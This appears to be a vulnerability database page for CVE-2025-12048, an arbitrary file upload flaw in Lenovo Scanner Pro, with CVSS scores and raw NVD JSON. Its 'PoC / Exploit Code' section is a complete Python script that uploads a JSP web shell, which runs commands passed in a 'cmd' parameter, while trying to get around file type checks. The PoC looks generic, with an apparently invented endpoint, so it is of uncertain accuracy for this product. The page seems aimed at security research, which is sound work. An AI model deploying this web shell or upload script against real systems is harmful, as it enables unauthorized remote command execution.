Security Vulnerability Report
CVE-2025-12048 CVSS 7.5 HIGH

CVE-2025-12048

Published: 2025-11-12 20:15:38
Last Modified: 2026-04-15 00:35:42

Description

An arbitrary file upload vulnerability in the Lenovo Scanner Pro client, reported during an internal security assessment, could allow remote code execution or unauthorized control of the affected system.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No structured (CPE) configuration data is available for this record. Affected product as listed on this page:

Lenovo Scanner Pro, versions earlier than 1.0.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12048 PoC - Lenovo Scanner Pro Arbitrary File Upload # This PoC demonstrates the file upload vulnerability import requests import json TARGET_URL = "http://target:8080/ScannerPro/upload" PAYLOAD_FILENAME = "malicious.jsp" PAYLOAD_CONTENT = "<%@ page import=\"java.util.*,java.io.*\" %>\n<% if(request.getParameter(\"cmd\")!=null){ Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while(disr!=null){ out.println(disr); disr = dis.readLine(); } } %>" def exploit_file_upload(): """Exploit arbitrary file upload vulnerability""" files = { 'file': (PAYLOAD_FILENAME, PAYLOAD_CONTENT, 'application/octet-stream') } # Bypass file type restrictions headers = { 'X-Original-Filename': PAYLOAD_FILENAME, 'Content-Type': 'multipart/form-data' } try: response = requests.post(TARGET_URL, files=files, headers=headers, timeout=10) if response.status_code == 200: result = response.json() uploaded_path = result.get('filePath', '/uploads/' + PAYLOAD_FILENAME) print(f"[+] File uploaded successfully to: {uploaded_path}") print(f"[+] Access payload at: {uploaded_path}?cmd=whoami") return uploaded_path else: print(f"[-] Upload failed with status: {response.status_code}") return None except Exception as e: print(f"[-] Error: {str(e)}") return None if __name__ == "__main__": print("CVE-2025-12048 PoC - Lenovo Scanner Pro Arbitrary File Upload") print("=" * 60) exploit_file_upload()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12048", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:37.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability was reported in the Lenovo Scanner Pro client during an internal security assessment that could allow remote code execution or unauthorized control of the affected system."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://iknow.lenovo.com.cn/detail/434326", "source": "[email protected]"}]}}